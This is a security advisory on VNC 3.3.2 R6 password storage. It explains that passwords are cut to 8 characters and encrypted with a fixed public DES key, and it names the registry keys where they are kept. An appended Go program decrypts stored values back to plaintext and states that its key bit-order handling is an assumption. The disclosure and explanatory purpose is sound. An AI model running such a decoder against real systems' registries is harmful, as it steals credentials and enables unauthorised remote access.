‘VNC 3.3.2 R6 uses a weak password protection mechanism’

Summary

‘VNC is a free software package that permits users to view a remote desktop in real time. To protect against intrusions, VNC is password protected. The stored password is encrypted with DES, which is an extremely strong encryption scheme, but the way VNC applies the encryption is rather poor, and the password can be easily decrypted by anyone with read access to the registry.’

Credit:

‘The information has been provided by: Conde Vampiro.’


Details

‘The software contains two vulnerabilities:

1) Fixed password length (up to 8 characters).
2) Fixed encryption key.

1) Fixed password length.
When we install the VNC server on a Windows box, we can find the encrypted password at the following registry keys (look for ‘password’):
HKEY_CURRENT_USER\Software\ORL\WinVNC3
HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3

When we enter a password of arbitrary length, the VNC server encrypts it but drops (nullifies) every byte after the 8th. This is demonstrated here:

Input password -> micasaesazul
Key -> 23 82 107 6 35 78 88 7
Encrypted password -> 1f f1 6f 1a cc 34 64 f0

Input password -> micasaesroja
Key -> 23 82 107 6 35 78 88 7
Encrypted password -> 1f f1 6f 1a cc 34 64 f0

In both cases, the VNC server interpreted the password as ‘micasaes’. An eight-character password is usually too short.

2) Fixed encryption key.
When the VNC server encrypts a password it always uses the same fixed key, so the encrypted output for a given password is always the same. For example, if we enter ‘conde’ as the password, the stored output is: df 6b 7e e8 94 26 d8 b5. Since the software is open source, the key is publicly available, making the encryption pointless.

Input password -> conde
Key -> 23 82 107 6 35 78 88 7
Encrypted password -> df 6b 7e e8 94 26 d8 b5

Input password -> 2621
Key -> 23 82 107 6 35 78 88 7
Encrypted password -> 73 05 1d 22 49 b6 05 1c

The VNC server always uses this key (‘23 82 107 6 35 78 88 7’) in the current version. This means that an attacker with read access to the registry can simply decode the password and obtain its plain-text version.’
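As an added illustration (not code from the advisory or from the VNC project), this Go program models the stored-password mechanism described above: the public fixed key, the 8-byte truncation, and the fact that the same key turns the stored bytes back into the password. It assumes that VNC zero-pads passwords shorter than 8 bytes and that VNC's bundled DES reads key bits in the reverse order of standard DES libraries, so the advisory's key is byte-wise bit-reversed before use.

```go
package main

import (
	"bytes"
	"crypto/des"
	"encoding/hex"
	"fmt"
)

// The fixed key exactly as the advisory lists it (17 52 6b 06 23 4e 58 07 in hex).
var vncFixedKey = []byte{23, 82, 107, 6, 35, 78, 88, 7}

// StandardDESKey converts the key to the form a standard DES library expects.
// Assumption: VNC's bundled d3des reads key bits least-significant bit first,
// so each byte is bit-reversed, giving e8 4a d6 60 c4 72 1a e0.
func StandardDESKey(vncKey []byte) []byte {
	out := make([]byte, len(vncKey))
	for i, b := range vncKey {
		for j := 0; j < 8; j++ { // mirror the eight bits of one byte (0x17 -> 0xe8)
			out[i] = out[i]<<1 | b>>j&1
		}
	}
	return out
}

// Obfuscate reproduces the stored value: at most 8 bytes of the password go into a
// zero-filled block (assumption: zero padding), which is DES-encrypted with the public key.
func Obfuscate(password string) []byte {
	var block [8]byte
	copy(block[:], password) // copies at most 8 bytes; the rest is silently dropped
	c, _ := des.NewCipher(StandardDESKey(vncFixedKey)) // 8-byte key, so NewCipher cannot fail
	out := make([]byte, 8)
	c.Encrypt(out, block[:])
	return out
}

// Recover shows why the stored value is no better than plaintext: the public key decrypts it.
func Recover(stored []byte) string {
	c, _ := des.NewCipher(StandardDESKey(vncFixedKey))
	out := make([]byte, 8)
	c.Decrypt(out, stored)
	return string(bytes.TrimRight(out, "\x00"))
}

func main() {
	for _, p := range []string{"micasaesazul", "micasaesroja", "conde", "2621"} {
		enc := Obfuscate(p)
		fmt.Printf("%-13s -> %s -> recovered %q\n", p, hex.EncodeToString(enc), Recover(enc))
	}
}
```

The printed value for ‘conde’ can be compared with the df 6b 7e e8 94 26 d8 b5 the advisory lists; a mismatch would point at the key bit-order assumption, while the truncation and round-trip behaviour hold either way.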
